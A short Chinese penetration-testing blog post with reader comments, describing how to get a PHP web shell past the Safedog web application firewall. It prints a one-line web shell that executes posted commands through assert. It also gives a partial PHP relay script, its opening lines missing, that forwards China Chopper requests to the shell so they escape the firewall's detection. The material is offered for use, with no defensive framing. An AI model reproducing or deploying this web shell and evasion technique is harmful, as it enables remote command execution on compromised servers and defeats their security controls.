脚本中转绕过安全狗

CracerCracer 2015-12-23 渗透测试 1,121 2 1

最新版的安全狗测试成功绕过

一句话

1
<!--?php $a=$_GET['a'];$a($_POST['cmd']);?-->

纯GET POST组成的一句话

链接地址 http://www.xxxx.com/shell.php?a=assert

只能用assert 不能用eval 用eval报错

但是用菜刀访问的话会被狗拦截

原因是安全狗查杀了菜刀中的base64_decode参数 用脚本中转即可解决

'method' => 'POST',
'header'=> "Content-type: application/x-www-form-urlencoded\r\n" .
"Content-Length: " . strlen($data) . "\r\n",
'content' => $data)
);

$context = stream_context_create($opts);
$html = @file_get_contents($webshell, false, $context); //发送post
echo $html;
?>
保存为test.php

菜刀访问本地http://localhost/test.php即可

转载请注明来自Cracer,本文标题:《脚本中转绕过安全狗》

喜欢 (1) 发布评论
2 条回复
加载中...
  1. zzkk 1年前 (2015-12-23)
    沙发

    ❓ 6666666666 你发现得么

    • Cracer
      Cracer 1年前 (2015-12-24)

      乌云上的拿来用

发表评论


Top